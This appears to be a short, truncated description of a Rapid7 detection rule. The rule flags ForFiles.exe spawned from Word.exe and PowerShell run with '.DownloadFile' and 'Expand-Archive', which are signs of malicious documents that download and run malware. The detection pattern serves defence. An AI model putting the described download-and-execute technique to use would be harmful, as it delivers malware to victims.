This detection identifies ‘ForFiles.exe’ being spawned as a child process of ‘Word.exe’. Malicious actors send malicious documents to targets that retrieve and execute malware from external locations when opened. This detection identifies the use of ‘PowerShell.exe’ with ‘.DownloadFile’ and ‘Expand-Archive’ passed to it via the command line. Rapid7 has observed malicious actors using this technique…
